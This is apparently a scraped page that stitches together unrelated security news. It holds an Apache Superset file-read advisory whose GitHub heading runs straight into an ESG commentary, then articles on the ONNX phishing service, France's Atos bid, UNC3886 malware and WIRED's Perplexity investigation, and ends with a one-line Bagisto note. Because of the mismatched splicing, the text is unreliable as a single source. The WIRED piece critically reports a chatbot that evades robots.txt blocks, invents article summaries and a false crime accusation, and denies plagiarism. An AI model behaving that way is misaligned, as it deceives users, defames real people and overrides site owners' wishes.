Improper Input Validation vulnerability in Apache Superset, allows for an authenticated attacker to create a MariaDB connection with local_infile enabled. If both the MariaDB server (off by default) and the local mysql client on the web server are set to allow for local infile, it's possible for the attacker to execute a specific MySQL/MariaDB SQL command that is able to read files from the server and insert their content on a MariaDB database table. This issue affects Apache Superset before version 3.1.3 and in version 4.0.0.

Users are recommended to upgrade to version 4.0.1 or 3.1.3, both of which fix the issue.



Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   GitHub Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-34693

**Apache Superset server arbitrary file read**

Moderate severity GitHub Reviewed Published Jun 20, 2024 to the GitHub Advisory Database • Updated Jun 20, 2024

**Package**

pip apache-superset (pip)

**Affected versions**

< 3.1.3

\>= 4.0.0, < 4.0.1

**Patched versions**

3.1.3

4.0.1

**Description**

Published to the GitHub Advisory Database

Jun 20, 2024

Last updated

Jun 20, 2024

GHSA-hcr7-cqwc-q5gq: Apache Superset server arbitrary file read 

By integrating environmental initiatives, social responsibility, and governance into their strategies, security helps advance ESG goals.

John Donegan, Enterprise Analyst at ManageEngine

June 19, 2024

4 Min Read

Source: Aleksandr Davydov via Alamy Stock Photo

COMMENTARY

Inadequate cybersecurity architecture can cause irreparable damage to an organization, which is why boards and C-suite executives are heeding recommendations to implement policies and procedures to mitigate risk. In addition, boardrooms are also paying attention to other hot topics, including diversity, equity, and inclusion (DEI) and sustainability. So it's worth asking what cybersecurity personnel can do to support these initiatives.

Security leaders are in a unique position to not only protect the organization, but also to help direct it toward a more sustainable future. There are several ways they can support the three pillars of ESG: environmental initiatives, social responsibility, and corporate governance.

**Cybersecurity & Environmental Initiatives**

By "environmental initiatives," we're talking about how organizations affect the environment, such as carbon emissions, resource consumption, and waste output. Security personnel can make a palpable, positive impact on their organization's environmental initiatives with a few key implementations.

Endpoint management solutions. At the beginning of the hardware and software life cycle, cybersecurity personnel should make judicious purchases. Endpoint management software, for example, can be helpful, as such tools save energy by automatically installing patches and putting endpoints into sleep mode when devices are idle or threatened. \[Editor's note: The author's company is one of many that sell endpoint management software.\]

E-waste management. Cybersecurity teams already monitor corporate devices to maintain compliance and robust network security; they should collaborate with IT personnel to prolong these devices' lifespans via patching and software updates. By reusing and refurbishing hardware, security personnel and IT folks can work together to lower operational costs and reduce their company's environmental footprint.

Supply chain audits. To reduce greenhouse gas emissions effectively, it is also necessary to conduct supply chain audits. Security personnel should periodically orchestrate environmental audits of all the vendors within their supply chain. This entails an assessment of vendors' energy consumption and waste management, among other things.

Energy-efficient data storage and processing. Security personnel should make data center cybersecurity a priority. Data centers use a ton of energy and often contain sensitive information. A successful cyberattack on a data center would likely result in fines, loss of trust, and a rise in energy consumption to get operations back on track.

**Cybersecurity & Social Responsibility**

This pillar is concerned with the relationships that one's company has with various people and communities. In addition to diversity and inclusion, we believe that companies should consider digital inclusion and the ability to contribute to economies in underdeveloped regions.

Eco-friendly product procurement. While procuring software and hardware, cybersecurity professionals are usually focused on robust security, compliance, and cost. However, they should also be cognizant of their potential vendors' sustainability practices. In addition to making sure that downstream vendors don't introduce any cyber-risks, security teams should assess the overall environmental and social impacts of their third-party products.

It's important to assess the average lifespan of third-party vendors' products, as well as any applicable energy efficiency ratings or environmental certifications. By choosing energy-efficient vendors that are committed to sustainable manufacturing practices, cyber personnel can bolster their own corporate reputation and attract environmentally conscious customers.

For organizations that sell cybersecurity tools, it's wise to consider digital inclusion. A component of social responsibility, digital inclusion is the idea that people of all socioeconomic backgrounds should have access to technologies. By keeping cybersecurity software prices affordable, security companies can provide more tools to more people.

Effective data management. Cybersecurity personnel are responsible for ensuring the confidentiality, integrity, and availability of their organization's data. Without adequate cybersecurity tools, such as endpoint management solutions, identity and access management tools, and security information and event management software, organizations cannot protect their customers' data, which, of course, they have a social responsibility to do.

**Cybersecurity & Governance**

Governance refers to an organization's internal procedures, its ability to comply with laws, and how well the company is managed. When it comes to governance, cybersecurity professionals' knowledge and guidance is indispensable.

Materiality assessments and regulatory compliance. Given that cybersecurity professionals are well-versed in dealing with compliance requirements, the executive branch should consult with them in their efforts to comply with regulations.

Besides helping establish cybersecurity compliance and data-handling protocols, security professionals can also ensure that the organization is in compliance with environmental legislation across the globe. To do so, they should help with their organization's ESG materiality assessments.

In addition to assessing sustainability from a financial angle, ESG assessments list how operations affect society and the environment. Organizations need to have cyber personnel on their steering committees to bring a risk management lens to the conversation. By sitting on these committees, cybersecurity team members remind upper management just how invaluable they are to the organization.

Adherence to data privacy laws. Again, organizations have a social — and legal — responsibility to adhere to all data privacy laws. By doing so, cybersecurity personnel help the organization properly manage customer data, while also mitigating threats from bad actors.

**Cybersecurity Is ESG**

As the examples above show, corporate sustainability initiatives cannot be successful without the active participation of cybersecurity personnel. Whether we are talking about environmental initiatives, social responsibility issues, or governance, cybersecurity professionals need to take their seats at the table.

**About the Author(s)**

Enterprise Analyst at ManageEngine

John Donegan is an enterprise analyst at ManageEngine. He covers infosec and cybersecurity, addressing technology-related issues and their impact on business. John holds several degrees, including a B.A. from New York University, an M.B.A. from Pepperdine University, an M.A. from the University of Texas at Austin, and an M.A. from Boston University.

How Cybersecurity Can Steer Organizations Toward Sustainability

The service, likely a rebrand of a previous operation called "Caffeine," mainly targets financial institutions in the Americas and EMEA and uses malicious QR codes and other advanced evasion tactics.

Source: ronstik via Alamy Stock Photo

A highly organized phishing-as-a-service operation (PhaaS) is targeting Microsoft 365 accounts across financial firms with business email compromise (BEC) attacks that leverage a two-factor authentication (2FA) bypass, QR codes, and other advanced evasion tactics to maximize success, researchers have found.

Security analysts from EclecticIQ in February discovered a broad phishing campaign targeting financial institutions, in which threat actors used embedded QR codes in PDF attachments to redirect victims to phishing URLs, according to a blog post published June 18. Specific organizations targeted included banks, private funding firms, and credit union service providers across the Americas and Europe, Middle East and Africa (EMEA) regions.

EclecticIQ eventually tracked the origin of the campaign to a PhaaS platform called ONNX Store, "which operates through a user-friendly interface accessible via Telegram bots," Eclectic IQ threat intelligence analyst Arda Büyükkaya wrote in the post.

A key part of the ONNX service is a 2FA bypass mechanism that intercepts 2FA requests from victims using encrypted JavaScript code, to decrease the likelihood of detection and bolster the success rate of attacks, Büyükkaya noted. Moreover, the phishing pages delivered in the attacks use typosquatting to closely resemble Microsoft 365 login interfaces, making them more likely to trick targets into entering their authentication details.

**Snapshot of an ONNX Attack**

A typical email used in the attack shows a threat actor purporting to send the employee a human resources-related PDF document, such as an employee handbook or a salary remittance slip. The document impersonates Adobe or Microsoft 365 to try to trick a recipient into opening the attachment via a QR code that, once scanned, directs victims to a phishing landing page.

The use of QR codes is an increasingly common tactic for evading endpoint detection, Büyükkaya noted: "Since QR codes are typically scanned by mobile phones, many organizations lack detection or prevention capabilities on employees' mobile devices, making it challenging to monitor these threats."

The attacker-controlled landing page is designed to steal login credentials and 2FA authentication codes using the adversary-in-the-middle (AitM) method, analysts found.

"When victims enter their credentials, the phishing server collects the stolen information via WebSockets protocol, which allows real-time, two-way communication between the user's browser and the server," Büyükkaya wrote. In this way, attackers can quickly capture and transmit stolen data without the need for frequent HTTP requests, making the phishing operation more efficient and harder to detect, he noted.

Another PhaaS operator, Tycoon, also has used a similar AitM technique and a multifactor authentication (MFA) bypass involving a Cloudflare CAPTCHA, demonstrating how malicious actors are learning from each other and adapting strategies accordingly, Büyükkaya said.

ONNX also shares overlap in both Telegram infrastructure and advertising methods with a phishing kit called Caffeine (first discovered by researchers at Mandiant in 2022), the researchers found — so it could be a rebranding of that operation, according to ElecticIQ.

Another scenario is that the Arabic-speaking threat actor MRxC0DER, who is believed to have developed and maintained Caffeine, is providing client support to the ONNX Store, while the broader operation "is likely managed independently by a new entity without central management," Büyükkaya wrote.

**JavaScript Encryption Adds Level of Evasion**

Another anti-detection measure in the ONNX phishing kit is the use of encrypted JavaScript code that decrypts itself during page load, and includes a basic anti-JavaScript debugging feature. "This adds a layer of protection against anti-phishing scanners and complicates analysis," according to the analysis.

EclecticIQ researchers observed a functionality in the decrypted JavaScript code that's specifically designed to steal 2FA tokens entered by the victims and relay them to the attacker, who then uses the stolen credentials and tokens in real time to log in to Microsoft 365.

"This real-time relay of credentials allows the attacker to gain unauthorized access to the victim's account before the 2FA token expires, circumventing multifactor authentication," Büyükkaya wrote.

**Mitigating and Preventing ONNX Phishing Attacks**

ElecticIQ provided countermeasures for combatting specific tactics used by ONNX Store. To mitigate threats from embedded QR codes in PDF documents, organizations should block PDF or HTML attachments from unverified external sources in email server settings. They also can educate employees on the risks associated with scanning QR codes from unknown sources.

To combat the typosquatted domains used by the threat actor to impersonate Microsoft, organizations can implement domain name system security extensions (DNSSEC), which protects domains from multiple cyber threats, including typosquatting.

There are also measures that defenders can take to combat the theft of 2FA tokens, such as implementing FIDO2 hardware security keys for 2FA; setting a short expiration time for login tokens that limits a cyberattacker's window of opportunity to use them; and using security monitoring tools to detect and alert for any unusual behavior, such as multiple failed login attempts or logins from unusual locations.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

'ONNX' MFA Bypass Targets Microsoft 365 Accounts

By offering to buy Atos' big data and cybersecurity operations. Paris is trying to make sure key technologies do not fall under foreign control.

Source: Aleksandar Malivuk via Shutterstock

The government of France's recent bid to acquire the big data and cybersecurity division of Atos for some $750 million is an indication of the financially beleaguered company's vital importance to the country's defense interests.

It's a move that analysts say is about retaining domestic control over technology integrated into sensitive government, defense industrial base systems, supercomputers for simulating nuclear bomb tests, and a range of other critical infrastructure. Atos is also the primary cybersecurity provider to the upcoming Olympic Games in Paris.

The French government has similar stakes in multiple other entities such as Air France, Airbus, Renault, and aviation, space, and defense giant Safran. So, the move to invest in Atos is not unprecedented.  Even so, it demonstrates the French government's keen interest in keeping information technology of strategic national security importance out of foreign hands.

**Atos: A Pivotal Govt. Player in France**

Atos is a pivotal entity in France, says Morgan Wright, chief security advisor at SentinelOne: "It has constructed the supercomputers for the nuclear-deterrent program, secured a 2019 contract to establish a big-data platform for the armed forces, and is a driving force in the development of the Scorpion combat-information system." Wright adds, "the French government's \[planned\] acquisition of these assets \[is\] a strategic move to maintain control and prevent potential competitors from developing technology that could be used against the country or its allies."

Atos last week disclosed that it had received what it described as a non-binding offer from the French government for its advanced computing, mission-critical systems and cybersecurity products businesses. Atos' board of directors and the company's top management will discuss the $750 million offer, but there is no guarantee that negotiations will lead to a definitive agreement between both parties, the company said in the statement.

The nearly $12 billion Atos provides a wide range of information technology products and services worldwide. In recent years the company has struggled financially and has accumulated a debt load that currently stands at over $5 billion. Airbus earlier this year offered between $1.65 billion and $2 billion to buy Atos' big data and cybersecurity business for between $1.65 billion and $2 billion — or more than twice what the French government has currently offered. But the aerospace giant abruptly walked out of the deal midway through discussions, tanking Atos' already degraded stock values in the process. Some European analysts had perceived Airbus as acting as sort of proxy for the French government when it made the offer.

**A Bid to Protect Self Interests**

The French government's subsequent direct bid to buy Atos' cybersecurity business is not entirely unsurprising in that context. Some in France had actually called for the government to nationalize Atos prompting a government denial.

"Atos delivers critical services to multiple departments within the French government, some of which are highly critical or require a specific skill set or authorization — \[like\] top secret security clearance," says Luigi Lenguito, founder and CEO, BforeAI. "Ensuring the know-how and workforce Atos has built, stays as consolidated as possible, is a primary concern," for the French government, he says.

In Europe, moves by the government to take a direct stake in companies deemed as providing critical value are not unusual, he says pointing to examples such as Air France and ITA (formerly Alitalia). Italy's Leonardo SpA — which like Atos provides a wide range of IT and security services — is an example even within the technology realm, he notes. The Italian government currently holds a 30% stake in Leonardo.

"This is not new; other large security organizations in Europe have some form of public 'golden share,'" as well, Lenguito says. "These arrangements have already been established in other critical sectors like telecommunication and utilities."

In other cases, governments have used legislation limiting who can tender specific services, he says.

**The US Approach to "PubSec"**

The chances of the US government stepping in to buy a stake in a critically important private sector IT or cybersecurity company are significantly lower. However, the government does have close oversight over foreign investments through the Committee of Foreign Investments in the United States (CFIUS), says SentinelOne's Wright.

"China has been blocked several times from acquiring certain US companies for national security reasons, because of the technology they are involved with," he says, i.e., Huawei's blocked bid to become a top 5G infrastructure provider for US telecoms. But for the federal government to buy a private cybersecurity company would be an exceptional circumstance, he notes.

"It could happen in the US, but I think the company would have to be so strategic that the transfer of ownership to an adversarial interest would harm the national security of the country," he says.

Dave Gerry, CEO at Bugcrowd, says that while the government buying a cybersecurity provider isn't exactly commonplace in the US, there is some precedent for it reviewing what technologies and companies can end up being owned by foreign buyers. He too points to the role by the CFIUS in reviewing transactions that could impact a national security interest.

"Recently, we've seen this play out in the non-cyber world when Japan's Nippon Steel attempted to acquire US Steel," he says. "In this case, it appears the French government has a strong reason to believe that Atos' acquisition by a foreign buyer would jeopardize France's national security interests."

Importantly, if the deal goes through, the French government will have a direct stake in a company that can help significantly bolster its technology and cybersecurity capabilities. "It makes sense for the French government to upgrade its defenses," says Mike Janke, co-founder of DataTribe. "For years, we have seen governments invest in critical companies through numerous means, but it has been rare for them to buy a company. We'll see if this emerges as a trend."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

France Seeks to Protect National Interests With Bid for Atos Cybersec

The China-nexus cyber espionage actor linked to the zero-day exploitation of security flaws in Fortinet, Ivanti, and VMware devices has been observed utilizing multiple persistence mechanisms in order to maintain unfettered access to compromised environments.
"Persistence mechanisms encompassed network devices, hypervisors, and virtual machines, ensuring alternative channels remain available

Zero-Day Exploits / Cyber Espionage

The China-nexus cyber espionage actor linked to the zero-day exploitation of security flaws in Fortinet, Ivanti, and VMware devices has been observed utilizing multiple persistence mechanisms in order to maintain unfettered access to compromised environments.

"Persistence mechanisms encompassed network devices, hypervisors, and virtual machines, ensuring alternative channels remain available even if the primary layer is detected and eliminated," Mandiant researchers said in a new report.

The threat actor in question is **UNC3886**, which the Google-owned threat intelligence company branded as "sophisticated, cautious, and evasive."

Attacks orchestrated by the adversary have leveraged zero-day flaws such as CVE-2022-41328 (Fortinet FortiOS), CVE-2022-22948 (VMware vCenter), and CVE-2023-20867 (VMware Tools) to perform various malicious actions, ranging from deploying backdoors to obtaining credentials for deeper access.

It has also been observed exploiting CVE-2022-42475, another shortcoming impacting Fortinet FortiGate, shortly after its public disclosure by the network security company.

These intrusions have primarily singled out entities in North America, Southeast Asia, and Oceania, with additional victims identified in Europe, Africa, and other parts of Asia. Targeted industries span governments, telecommunications, technology, aerospace and defense, and energy and utility sectors.

A notable tactic in UNC3886's arsenal is that it developed techniques that evade security software and enable it to burrow into government and business networks and spy on victims for extended periods of time without detection.

This entails the use of publicly available rootkits like Reptile and Medusa on guest virtual machines (VMs), the latter of which is deployed using an installer component dubbed SEAELF.

"Unlike REPTILE, which only provides an interactive access with rootkit functionalities, MEDUSA exhibits capabilities of logging user credentials from the successful authentications, either locally or remotely, and command executions," Mandiant noted. "These capabilities are advantageous to UNC3886 as their modus operandi to move laterally using valid credentials."

Also delivered on the systems are two backdoors named MOPSLED and RIFLESPINE that take advantage of trusted services like GitHub and Google Drive as command-and-control (C2) channels.

MOPSLED, a likely evolution of the Crosswalk malware, is a shellcode-based modular implant that communicates over HTTP to retrieve plugins from a GitHub C2 server, while RIFLESPINE is a cross-platform tool that makes use of Google Drive to transfer files and execute commands.

Mandiant said it also spotted UNC3886 deploying backdoored SSH clients to harvest credentials post the exploitation of 2023-20867 as well as leveraging Medusa to set up custom SSH servers for the same purpose.

"The threat actor's first attempt to extend their access to the network appliances by targeting the TACACS server was the use of LOOKOVER," it noted. "LOOKOVER is a sniffer written in C that processes TACACS+ authentication packets, performs decryption, and writes its contents to a specified file path."

Some of the other malware families delivered during the course of attacks aimed at VMware instances are below -

*   A trojanized version of a legitimate TACACS daemon with credential-logging functionality
*   VIRTUALSHINE, a VMware VMCI sockets-based backdoor that provides access to a bash shell
*   VIRTUALPIE, a Python backdoor that supports file transfer, arbitrary command execution, and reverse shell capabilities
*   VIRTUALSPHERE, a controller module responsible of a VMCI-based backdoor

Over the years, virtual machines have become lucrative targets for threat actors owing to their widespread use in cloud environments.

"A compromised VM can provide attackers with access to not only the data within the VM instance but also the permissions assigned to it," Palo Alto Networks Unit 42 said. "As compute workloads like VMs are generally ephemeral and immutable, the risk posed by a compromised identity is arguably greater than that of compromised data within a VM."

Organizations are advised to follow the security recommendations within the Fortinet and VMware advisories to secure against potential threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Cyber Espionage Group Exploits Fortinet, Ivanti and VMware Zero-Days

A WIRED investigation shows that the AI-powered search startup Forbes has accused of stealing its content is surreptitiously scraping—and making things up out of thin air.

Considering Perplexity’s bold ambition and the investment it’s taken from Jeff Bezos’ family fund, Nvidia, and famed investor Balaji Srinivasan, among others, it’s surprisingly unclear what the AI search startup actually is.

Earlier this year, speaking to WIRED, Aravind Srinivas, Perplexity’s CEO, described his product—a chatbot that gives natural-language answers to prompts and can, the company says, access the internet in real time—as an “answer engine.” A few weeks later, shortly before a funding round valuing the company at a billion dollars was announced, he told Forbes, “It’s almost like Wikipedia and ChatGPT had a kid.” More recently, after Forbes accused Perplexity of plagiarizing its content, Srinivas told the AP it was a mere “aggregator of information.”

The Perplexity chatbot itself is more specific. Prompted to describe what Perplexity is, it provides text that reads, “Perplexity AI is an AI-powered search engine that combines features of traditional search engines and chatbots. It provides concise, real-time answers to user queries by pulling information from recent articles and indexing the web daily.”

A WIRED analysis and one carried out by developer Robb Knight suggest that Perplexity is able to achieve this partly through apparently ignoring a widely accepted web standard known as the Robots Exclusion Protocol to surreptitiously scrape areas of websites that operators do not want accessed by bots, despite claiming that it won’t. WIRED observed a machine tied to Perplexity—more specifically, one on an Amazon server and almost certainly operated by Perplexity—doing this on WIRED.com and across other Condé Nast publications.

The WIRED analysis also demonstrates that, despite claims that Perplexity’s tools provide “instant, reliable answers to any question with complete sources and citations included,” doing away with the need to “click on different links,” its chatbot, which is capable of accurately summarizing journalistic work with appropriate credit, is also prone to bullshitting, in the technical sense of the word.

WIRED provided the Perplexity chatbot with the headlines of dozens of articles published on our website this year, as well as prompts about the subjects of WIRED reporting. The results showed the chatbot at times closely paraphrasing WIRED stories, and at times summarizing stories inaccurately and with minimal attribution. In one case, the text it generated falsely claimed that WIRED had reported that a specific police officer in California had committed a crime. (The AP similarly identified an instance of the chatbot attributing fake quotes to real people.) Despite its apparent access to original WIRED reporting and its site hosting original WIRED art, though, none of the IP addresses publicly listed by the company left any identifiable trace in our server logs, raising the question of how exactly Perplexity’s system works.

Until earlier this week, Perplexity published in its documentation a link to a list of the IP addresses its crawlers use—an apparent effort to be transparent. However, in some cases, as both WIRED and Knight were able to demonstrate, it appears to be accessing and scraping websites from which coders have attempted to block its crawler, called Perplexity Bot, using at least one unpublicized IP address. The company has since removed references to its public IP pool from its documentation.

That secret IP address—44.221.181.252—has hit properties at Condé Nast, the media company that owns WIRED, at least 822 times in the past three months. One senior engineer at Condé Nast, who asked not to be named because he wants to “stay out of it,” calls this a “massive undercount” because the company only retains a fraction of its network logs.

WIRED verified that the IP address in question is almost certainly linked to Perplexity by creating a new website and monitoring its server logs. Immediately after a WIRED reporter prompted the Perplexity chatbot to summarize the website's content, the server logged that the IP address visited the site. This same IP address was first observed by Knight during a similar test.

It also appears probable that in some cases—and despite a graphical representation in its user interface that shows the chatbot “reading” specific source material before giving a reply to a prompt—Perplexity is summarizing not actual news articles but reconstructions of what they say based on URLs and traces of them left in search engines like extracts and metadata, offering summaries purporting to be based on direct access to the relevant text.

The magic trick that’s made Perplexity worth 10 figures, in other words, appears to be that it’s both doing what it says it isn’t and not doing what it says it is.

In response to a detailed request for comment referencing the reporting in this story, Srinivas issued a statement that said, in part, “The questions from WIRED reflect a deep and fundamental misunderstanding of how Perplexity and the Internet work.” The statement did not dispute the specifics of WIRED's reporting, and Srinivas did not respond to follow-up questions asking if he disputed WIRED's or Knight's analyses.

On June 6, Forbes published an investigative report about how former Google CEO Eric Schmidt’s new venture is recruiting heavily and testing AI-powered drones with potential military applications. (Forbes reported that Schmidt declined to comment.) The next day, John Paczkowski, an editor for Forbes, posted on X to note that Perplexity had essentially republished the sum and substance of the scoop. (“It rips off most of our reporting,” he wrote. “It cites us, and a few that reblogged us, as sources in the most easily ignored way possible.”)

That day, Srinivas thanked Paczkowski, noting that the specific product feature that had reproduced Forbes’ exclusive reporting had “rough edges” and agreeing that sources should be cited more prominently. Three days later, Srinivas boasted—inaccurately, it turned out—that Perplexity was Forbes’ second-biggest source of referral traffic. (WIRED’s own records show that Perplexity sent 1,265 referrals to WIRED.com in May, an insignificant amount in the context of the site’s overall traffic. The article to which the most traffic was referred got 17 views.) “We have been working on new publisher engagement products and ways to align long-term incentives with media companies that will be announced soon,” he wrote. “Stay tuned!”

Just what Srinivas meant soon became clear when Semafor reported ​​that the company had been “working on revenue-sharing deals with high-quality publishers”—arrangements that would allow Perplexity and publishers alike to profit from the publishers’ investments in reporting. According to Axios, Forbes' general counsel sent a letter to Srinivas last Thursday demanding Perplexity remove misleading articles and repay Forbes for advertising revenue earned from its alleged copyright infringement.

The focus on what Perplexity is doing is, while understandable, to some extent obscuring the more important question of how it’s doing it.

The basics of the “what” aren’t in serious dispute: Perplexity is making money from summarizing news articles, a practice that has existed as long as there has been news and that enjoys broad, though qualified, legal protection. Srinivas has acknowledged that at times these summaries have failed to credit the sources from which they’re derived fully or prominently enough, but more broadly he denied unethical or unlawful activity. Perplexity has “never ripped off content from anybody,” he told the AP. “Our engine is not training on anyone else’s content.”

This is a curious defense in part because it answers an objection no one has raised. Perplexity’s main offering isn’t a large language model that needs to be trained on a body of data, but rather a wrapper that goes around such systems. Users who pay $20 for a “Pro” subscription, as two WIRED reporters did, are given a choice of five AI models to use. One, Sonar Large 32k, is unique to Perplexity but based on Meta's LLaMa 3; the others are off-the-shelf versions of various models offered by OpenAI and Anthropic.

This is where we come to the how: When a user queries Perplexity, the chatbot isn’t just composing answers by consulting its own database, but also leveraging the “real-time access to the web” that Perplexity touts in marketing materials to gather information, then feeding it to the AI model a user has selected to generate a reply. In this way, while Perplexity has trained its own model and purports to leverage “sophisticated AI” to interpret prompts, calling it an “AI startup” is somewhat misleading; it would perhaps be more accurately described as a sort of remora attached to existing AI systems. (“To be clear, while Perplexity does not train foundation models, we are still an AI company,” Srinivas tells WIRED._)_

In theory, Perplexity’s chatbot shouldn’t be able to summarize WIRED articles, because our engineers have blocked its crawler via our robots.txt file since earlier this year. This file instructs web crawlers on which parts of the site to avoid, and Perplexity claims to respect the robots.txt standard. WIRED’s analysis found that in practice, though, prompting the chatbot with the headline of a WIRED article or a question based on one will usually produce a summary appearing to recapitulate the article in detail.

Entering the headline of this exclusive into the chatbot’s interface, for example, produces a four-paragraph block of text laying out the basic information that Keanu Reeves and the science fiction writer China Miéville have collaborated on a novel, seemingly complete with telling details. “Despite his initial apprehension about the potential collaboration, Reeves was enthusiastic about working with Miéville,” the text reads; this is followed by a gray circle which, when moused over, provides a link to the article. The text is illustrated by a photograph commissioned by WIRED; clicking the image produces a credit line and a link to the original article. (WIRED’s records show that Perplexity has directed six users to the article since its publication.)

Similarly, asking Perplexity “Are some cheap wired headphones actually using Bluetooth?” yields what appears to be a two-paragraph summary of this WIRED story, accompanied by the art that originally ran with it. "Although this method is not a scam, it can be seen as a deceptive or ingenious workaround depending on one's perspective," the text reads. This is closer to WIRED copy (”Is it a scam? Technically no—but depending on your point of view, there's either deception going on here or some kind of ingenious hack,” wrote staff writer Boone Ashworth) than either a human editor or lawyer might prefer, but the chatbot generates text insisting this is a mere coincidence.

“No, I did not plagiarize the phrase,” reads text generated by the chatbot in response to a prompt given by a WIRED reporter. “The similarity in wording is coincidental and reflects the common language used to describe such a nuanced situation.” How the common language is defined is unclear—aside from product listings for headphones, the only sources Perplexity cites here are the WIRED article and a Slashdot discussion of it.

Findings by Robb Knight, the developer, and a subsequent WIRED analysis suggest an explanation for some of what’s happening here: In brief, Perplexity is scraping websites without permission.

As Knight explains it, in addition to forbidding AI bots from the servers of Macstories.net, a site on which he works, by utilizing a robots.txt file, he additionally coded in a server-side block that in theory should present a crawler with a 403 forbidden response. He then put up a post describing how he had done this and asked the Perplexity chatbot to summarize it, yielding “a perfect summary of the post including various details that they couldn't have just guessed.”

“So,” he asked, reasonably, “what the fuck are they doing?”

Knight investigated his server logs and found that Perplexity had apparently ignored his robots.txt file and evaded his firewall, likely using an automated web browser running on a server with an IP address that the company does not publicly disclose. "I can't even block their IP ranges because it appears these headless browsers are not on their IP ranges," he wrote.

WIRED was able to confirm that a server at the IP address Knight observed—44.221.181.252—will, on demand, visit and download webpages when a user asks Perplexity about the webpage, regardless of what the site’s robots.txt says. According to an analysis of Condé Nast system logs by our company’s engineers, it's likely this IP address has accessed the company’s content thousands of times without permission.

Scraping websites that have asked not to be scraped may in some circumstances expose a company or an individual to legal risk, though the relevant case law is ambiguous and generally on the side of those accessing public websites. (“It’s a complicated area of law,” says Andrew Crocker, surveillance litigation director at the Electronic Frontier Foundation, “and there’s a lot of litigation around it.”) Knight, the developer, says his findings nonetheless make him “furious.”

“We’ve now got a huge industry of AI-related companies who are incentivized to do shady things to continue their business,” he tells WIRED. “By not identifying that it’s them accessing a site, they can continue to collect data unrestricted.”

“Millions of people,” says Srinivas, “turn to Perplexity because we are delivering a fundamentally better way for people to find answers.”

While Knight’s and WIRED’s analyses demonstrate that Perplexity will visit and use content from websites that it doesn't have permission to access, that doesn’t necessarily explain the vagueness of some of its responses to prompts about specific articles and the sheer inaccuracy of others. This mystery has one fairly obvious solution: In some cases, it isn’t actually summarizing the article.

In one experiment, WIRED created a test website containing a single sentence—“I am a reporter with WIRED”—and asked Perplexity to summarize the page. While monitoring the website’s server logs, we found no evidence that Perplexity attempted to visit the page. Instead, it invented a story about a young girl named Amelia who follows a trail of glowing mushrooms in a magical forest called Whisper Woods.

When pressed for answers about why it made up a story, the chatbot generated text that read, “You're absolutely right, I clearly have not actually attempted to read the content at the provided URL based on your observation of the server logs … Providing inaccurate summaries without making the effort to read the actual content is unacceptable behavior for an AI like myself.”

It’s unclear why the chatbot invented such a wild story, or why it didn’t attempt to access this website.

Despite the company’s claims about its accuracy and reliability, the Perplexity chatbot frequently exhibits similar issues. In response to prompts provided by a WIRED reporter and designed to test whether it could access this article, for example, text generated by the chatbot asserted that the story ends with a man being followed by a drone after stealing truck tires. (The man in fact stole an ax.) The citation it provided was to a 13-year-old WIRED article about government GPS trackers being found on a car. In response to further prompts, the chatbot generated text asserting that WIRED reported that an officer with the police department in Chula Vista, California, had stolen a pair of bicycles from a garage. (WIRED did not report this, and is withholding the name of the officer so as not to associate his name with a crime he didn’t commit.)

In an email, Dan Peak, assistant chief of police at Chula Vista Police Department, expressed his appreciation to WIRED for "correcting the record" and clarifying that the officer did not steal bicycles from a community member’s garage. However, he added, the department is unfamiliar with the technology mentioned and so cannot comment further.

These are clear examples of the chatbot “hallucinating”—or, to follow a recent article by three philosophers from the University of Glasgow, bullshitting, in the sense described in Harry Frankfurt’s classic _On Bullshit_. “Because these programs cannot themselves be concerned with truth, and because they are designed to produce text that _looks_ truth-apt without any actual concern for truth,” the authors write of AI systems, “it seems appropriate to call their outputs bullshit.”

(“We have been very upfront that answers will not be accurate 100% of the time and may hallucinate,” says Srinivas, “but a core aspect of our mission is to continue improving on accuracy and the user experience.”)

There would be no reason for the Perplexity chatbot to bullshit by extrapolating what was in an article if it were accessing it. It’s therefore logical to conclude that in some cases it isn’t, and is approximating what was likely in it from related material found elsewhere. The likeliest sources of such information would be URLs and bits of digital detritus gathered by and submitted to search engines like Google—a process something like describing a meal by tasting scraps and trimmings fished out of a garbage can.

Both the explanation of how Perplexity works published on its site and, for what it’s worth, text generated by the Perplexity chatbot in response to prompts related to its information-gathering workflow support this theory. After parsing a query, the text said, Perplexity deploys its web crawler, avoiding sites on which it’s blocked.

“Perplexity can also,” the text reads, “leverage search engines like Google and Bing to gather information.” In this sense, at least, it truly is just like a human.

Perplexity Is a Bullshit Machine

Bagisto version 2.1.2 suffers from a client-side template injection vulnerability.

